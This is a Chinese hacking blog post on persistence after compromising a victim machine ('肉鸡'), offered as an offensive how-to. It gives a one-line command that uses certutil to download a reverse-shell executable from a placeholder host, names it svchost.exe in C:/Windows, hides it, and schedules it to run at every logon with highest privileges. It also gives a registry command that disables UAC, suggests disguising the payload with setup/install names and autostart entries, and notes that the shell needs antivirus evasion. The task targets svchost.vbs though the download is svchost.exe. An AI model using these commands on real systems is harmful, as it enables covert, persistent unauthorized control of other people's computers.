权限维持之开机获取管理员权限

0x00 前言

看了看上一篇博客的时间已经是去年了,所以今天还是来水一篇吧,证明我还活着

很早之前就想写这玩意儿了,只不过一直因为时间问题一直拖到了现在,经过2天的各种查资料终于写出了一个最简单的

这里必须要吐槽一下360,流氓软件出身的果然不一样,修改注册表拦截,移动文件到启动目录拦截,system32文件夹下载文件拦截,你就说你有什么不拦截吧!!!

0x01 思路

先获取肉鸡的管理员权限,然后通过一系列手段达到肉鸡重启后能再次反弹一个管理员权限shell的目的(如果肉鸡装了360。。。直接跳过吧,不知道怎么绕过拦截添加计划任务)

思路:

  • msf 上线
  • 添加计划任务

细分一下:

  1. msf上线
  2. 进入c:/windows文件夹
  3. 自动下载可执行文件(就是你的反弹shell)
  4. 添加计划任务

0x02 具体操作

拿到管理员权限过后也就执行一句话

cd C:/Windows&&certutil -urlcache -split -f https://xxx/svchost.exe&&attrib +s +h svchost.exe&&schtasks.exe /Create /TN update /TR C:\Windows\svchost.vbs /SC ONLOGON /F /RL HIGHEST

每个命令大概解释

  1. 进入 C:/Windnws 文件夹
  2. 下载我的反弹shell(这个是弹到msf上的)
  3. 隐藏我的shell文件
  4. 新建一个计划任务,在用户登陆后开始执行

0x03 解决问题

你的reverse_shell需要解决的问题

  • 免杀 (自己想办法解决吧)
  • 能自行判断肉鸡是否联网(因为开机直接运行,没联网的话也就凉凉了)

演示视频:https://youtu.be/IYKFERG_53Y

0x04 也有简单粗暴的办法

  1. 关闭UAC

    1
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
  2. 将自己的shell可执行文件名字修改为 setup或者install或者uninstall等本来会触发UAC的关键字

  3. 加入开机项

    • 修改注册表
    • 直接加入开机目录

Powered by Hexo and Hexo-theme-hiker

Copyright © 2017 - 2018 Damit5's Blog All Rights Reserved.

UV : | PV :